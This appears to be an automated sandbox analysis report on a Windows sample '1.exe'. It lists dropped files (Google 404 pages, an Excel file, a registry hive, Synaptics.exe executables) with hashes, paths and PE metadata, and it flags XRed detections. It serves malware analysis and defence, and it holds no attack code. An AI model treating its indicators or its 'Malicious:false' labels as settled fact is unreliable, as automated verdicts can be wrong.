                                                                                                                    SHA-512:9958C4E3BF47CF36E20DAF2256CF5E988D44DF3C1DBB279BC108B95B870897CA986A7B70017A46E24E4FF9383A9429C18789B468FE29956BE481989DC3911042
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="O_DWKuNVL--_ESc8oP3Uuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.25997657714486
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0yR6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                    MD5:2CFEE4A7A22D87B7F93BA3088DD2CEF7
                                                                                                                    SHA1:DC036BC940E99C461F8ED8B3DA1CA742773A64A0
                                                                                                                    SHA-256:ED5E71887481B8FFC9796A5C0205D4FCB4324277F484570683F5735212E6AD5B
                                                                                                                    SHA-512:CB0E738BE07CC3ABC306C28AD143BF077DD136F1B6BA86267DA88AECFB0CFE8607621C51C90B97030D0BF7EA8805E6C737FDDF5164D3BE913D4EE100E623BB9B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.257417802448201
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+e+pAZewRDK4mW
                                                                                                                    MD5:05616047A97587562E81F06BD789BE4B
                                                                                                                    SHA1:0B9ACC06383DAB60643E5DD4F66DFAB8C43E1827
                                                                                                                    SHA-256:F93221E4A9412828B57EE281AD1651EE0A55BBE61DCCE6E434A04874C45E3188
                                                                                                                    SHA-512:838ECB7D58493443F6F7FCC18790E7571226B56DAEDE879D4ED4378FB374B7B982F1674E4816F65AF598EA48BC30B381A3792E17A34D5387EB0AB858F9E6651A
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2539822571349255
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+052SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g2+pAZewRDK4mW
                                                                                                                    MD5:210DCAC51CAC2B03EF546E86397ACA1C
                                                                                                                    SHA1:F0A26611AC655D5426674815F225B3E9BC8BD71C
                                                                                                                    SHA-256:CAF5722EA5B563AF4F3DEF61C33E5EE486DC53D0F0997461268E039244CF9AF7
                                                                                                                    SHA-512:F94634C67219F7986F26884941C85717A0CF2D1C304FCEC3F3E62B8F82BB561D6C50FC9543A326EC37611002286260A2E4194062D3CAF45A57C3B7EA87F21B09
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.258755459992018
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                    MD5:CE2D5D2907126FD4EC6F80EF0B4B74EB
                                                                                                                    SHA1:751398C80FF92B2F9BAE2CBF286F0DBCD8BB1BBD
                                                                                                                    SHA-256:E89FF12E7B972AA3F6AF1A57B1C10CD20FF0E74EA329BD5FCE30E4AB1227A25F
                                                                                                                    SHA-512:028D91886C79947ADC824B78C30FE65A199EB38D9503F2B08FCE3561437F44D61CC7F6CEF37097F915B6D8FB94AAEB45FB9610805C8B9194961DAE1DB97607D7
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.258640999418921
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+09iamSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4M+pAZewRDK4mW
                                                                                                                    MD5:BEE5BC6D0D255C51FBF03A61DE57BD26
                                                                                                                    SHA1:951D38E5433BC13568C99ABBEF2797076A099E2A
                                                                                                                    SHA-256:2F21CD0B4188D49EE6FD52880E41D4E6EB0A316BE075B247C79872744F01A176
                                                                                                                    SHA-512:40C9AB2BAA8EBF4FA1136552D2AE7DB07F33605BB76022E092DF5886E75A50BDA1E5FD613642486330D6800888CF13149009C671D73AFCD450D0974E6815E755
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18387
                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.278627987755061
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                    MD5:8213DD2C7D5A5C9662D2938BE703849C
                                                                                                                    SHA1:A1C3795DA43A0164B169EE6238AD9EFDC2929A67
                                                                                                                    SHA-256:4E42F0EE8ED720938F841D29E4C01CF79700CA53FD02C29C8DFF4EEB83B9CB65
                                                                                                                    SHA-512:B2F3C1FCF191102C97711FD10BEEE2A2E710A276C8D2C45CF3C06F4108C24B2086EA8F1E47AA6C22903422D57FB2265184FC08BDDEC172752A4DB739CD56E1C4
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SaXZ3l3EjCsHvHEyLV2jZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.264787141711439
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                    MD5:A0EF0A7B90AC7D26B0E14F7D15AE3193
                                                                                                                    SHA1:6F7A3983DE186383585A5485C880232B3C062C5B
                                                                                                                    SHA-256:BD6A506143F23B956F6467362123D30584E947AD56B2E8D7852949109E9DF06A
                                                                                                                    SHA-512:83E83D903A154943CBAE783DDDE50DF1C967E0B93B4DC380CF1DFCCCB4013876E2ABB546F593D6A5B0D871755242A5DC51AE689E78E117E2F73DFA0753F5815E
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q3ucf8aNp-E5DAsZGtCuKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2708240056155535
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0vrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                    MD5:BD4373CDB50BA315597B70DCB149044A
                                                                                                                    SHA1:059A0C744FCBB538482FFB5A115249F85364A76B
                                                                                                                    SHA-256:13E1016A0C33BE4ADA41A72484D9FE3F85EED0A1FCFB0ACA4D8D1F1DDD3E057A
                                                                                                                    SHA-512:830B74B54C628A70FFB1E7D0FC49A2689E24084EE323387050F7966C9EC1F8C312994A7EF8E9E5283EE51602512BEA65DF6B31B49A472DDD1ADEDF3F2BA488CD
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="saCziqWFAkrqMYAFVbNj9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263299926755047
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+01TbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                    MD5:B694F18937B923C719341DAC11244FA9
                                                                                                                    SHA1:9CB124ABD09C1E3BA403591B488EB83682A24083
                                                                                                                    SHA-256:C5C70B1C7FEC151B0D8A062A9AAB7578A246CD618933A3D3AE71B062FBEDDC39
                                                                                                                    SHA-512:119DA815E7EA2376215B9BC05323156ECE7E5A92C6BA568EDABF00A15D8F4DB82E2C6BC716FE0964CC8E6CB79AB8978CE550428C6AF0A028B25CC482F68CFF27
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kJ7wD94x3FBame4LCSsTZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.268602448567942
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0wuCbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                    MD5:1884CA0598AB0088FC091979E2E2E191
                                                                                                                    SHA1:17549906DE9EFFD54399AB61D78D948394B984D2
                                                                                                                    SHA-256:15505D6F32AAAF223287F86D60068DA77B0445E528AC7BC743662A8492638D3B
                                                                                                                    SHA-512:17BC5ACFF2EA2868BB73035F2048D4664A416D6145D521CCA0D9141F20570F1DE471A90DE6F813FABE932684A2DA087B930F2C9095BAD3A7E2F0318074C56966
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n9UqoUJyINaTFHjMYTiyRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.241269109409595
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0eyRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                    MD5:A2478FF1AC238686FA25F571F8673F6C
                                                                                                                    SHA1:D9CB224262B8D57F822710C72FC26EBE5364DDBA
                                                                                                                    SHA-256:20A1CACC10C7C73512140DDC2CF5FD591BFD020385B1C4756AF23AA38B5D75E8
                                                                                                                    SHA-512:B471A7495551C0E83235A31C82BF69FE52C29C819572C5FB105645FA5FA96B0DBB986C9A1E87F6C3C4600CA26EA8834D11C45E50DB901FE49EB245F19B3C6634
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gcTGRowsu-vayc_cYM2gcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.258415197370358
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                                    MD5:4BFFF3D51B141C2E387AD88068BB69C3
                                                                                                                    SHA1:891FB77214FC1D6DE305098990ABC330C7B07ACB
                                                                                                                    SHA-256:9B44E533F921BF04C5F24E2A73046A521CED5F529F458579A34D80B446253580
                                                                                                                    SHA-512:E0062E4728DBFDC769A946139C529FD500FF3D45582EC204E9060EFF5666F79BAC247A11CA0FADB32C9CF51A584407E288E282169A1188E80DB67BA2B1BAD8A1
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ii3ipW0ZDNMR425ze015HA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.253327595725399
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BqdoSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                    MD5:C93DEB775D5E6E0DCB3DA954E249DF3D
                                                                                                                    SHA1:6397A7DE487879FE738E6F5251C2DE846354B41D
                                                                                                                    SHA-256:2F75AFFD1F8364DB8C41BD0DF46BF460BD075E8055F9A3E2AE11DCBCE627F0AF
                                                                                                                    SHA-512:F03CECC94F9687371E8F531B0E47B69CE62888BF81B76F5A9E775608DEE4BB7448DDC0CB2E582FC7805FD0C853ED2A988DE2B4A5F33907DEFB71E9BB2F85A690
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0o3wa1GgXZ-ycUIFiIX5Tw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):329728
                                                                                                                    Entropy (8bit):6.754399552154763
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:aA6xKh6ckttv2vzCYaF82Dx6AU/AbMQTKhCVnXtn43J7:XkKh6c5bCYaF824EMQ+hCZXq
                                                                                                                    MD5:8F02CCF024090E3BD52574174749C778
                                                                                                                    SHA1:73CE3AFED686E7157CA919118B62F29F5A423196
                                                                                                                    SHA-256:F7E32CCE4D55BF0DC2F688466983F6F6AA69F1BDACAB7522297125AD04D9ECFC
                                                                                                                    SHA-512:97D68507DB1CACF116E19BAE4F01C99D9466AAF3A88F29AD52C4A9168E668AB8262F091ED4C0515D560774A013D53FFD8945CE5347198D6E65C4A7ACFC540E9C
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18387
                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):165
                                                                                                                    Entropy (8bit):1.3801032810853697
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:UvNFiKVMNv:UvNsKVkv
                                                                                                                    MD5:9AA76EF018A0F672FA8DF9799D834C34
                                                                                                                    SHA1:75B4E1ADC263E4F966CAD3ECA3A2C84638CA525E
                                                                                                                    SHA-256:ED0F89EA4BAE07B1876B61240D06D56CDDB5CE83EF10E41F68142378CB750B77
                                                                                                                    SHA-512:6A8AF40C8225E60E652BCCB7D7E7FF03A8A014A7AC782D620AA6120B134213D4A4E279EF0005FCCBA513E85785E7CF6EA42422A6E936F4F690E47D0AAD11AA77
                                                                                                                    Malicious:false
                                                                                                                    Preview:.user ..t.o.t.t.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):772096
                                                                                                                    Entropy (8bit):6.636956363807124
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9F6+:ansJ39LyjbJkQFMhmC+6GD9B
                                                                                                                    MD5:065BECDE24188ED65E53BECB09A5A039
                                                                                                                    SHA1:1B93E985BC3000BAC77112697F6702B2EB52CC37
                                                                                                                    SHA-256:641147AE6E518E7930EFE2A90B61DD0A22F23BBA6D77F7FAE48380A6F7842E6C
                                                                                                                    SHA-512:879D047CF07153B113D39A20BFDEC4B3429D5B431641D026AE38FBBD198C40BD28179CC03B9A208C3214B4E604E568E5813B20E720F150E9A06EE7C54D667A08
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1835008
                                                                                                                    Entropy (8bit):4.2988451233561795
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:LECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lfSD6VJSRhL:wCsL6seqD5SWSWVARh
                                                                                                                    MD5:8A8CB1BB8BB23FA49FA6C7240CA64FEC
                                                                                                                    SHA1:08EE29FF162066E444FA2279578302453671FCB7
                                                                                                                    SHA-256:017C495D36FD742C72E94C7BFB789B0EAE10B3329EFECF7090DAF8D04C60F46E
                                                                                                                    SHA-512:029A87BCBA78D4FBC7B3B792DDE63F4F192B970E1EB64D1E0D1CBA866F3A8F24C4342B3CCBFA79AEBB86029B37F504B7F91B7626CC3B72B507DAAEEC6ADFA3F6
                                                                                                                    Malicious:false
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):6.7652852257842975
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 93.58%
                                                                                                                    • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                                                    • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    File name:1.exe
                                                                                                                    File size:1'101'824 bytes
                                                                                                                    MD5:d0598443fa9984227105811e5d89b70f
                                                                                                                    SHA1:3932d4696f4130658fbf2a16e7f771fc756a63cc
                                                                                                                    SHA256:fc1595c71b570027b6712c70cafcc075686e14b5702a5a0910f642eb739ac01f
                                                                                                                    SHA512:142ebd6e1bf24d82533355e76bb9433deefdd4ee918ba04cc12419cc17cb564f86af386bf949617e386bffa1e0036ec5db912bc8b985a1de94330b3b14e3fd29
                                                                                                                    SSDEEP:24576:FnsJ39LyjbJkQFMhmC+6GD9nkKh5OYceEMQ+h0W:FnsHyjtk2MYC5GDT58M7hH
                                                                                                                    TLSH:2D359F22F3929077C5630A385CABA37958397F512F346D4B7BE4DE4C5E3A6C22835293
                                                                                                                    Icon Hash:1fc8cfce5e391d0d
                                                                                                                    Entrypoint:0x49ab80
                                                                                                                    Entrypoint Section:CODE
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                    DLL Characteristics:
                                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
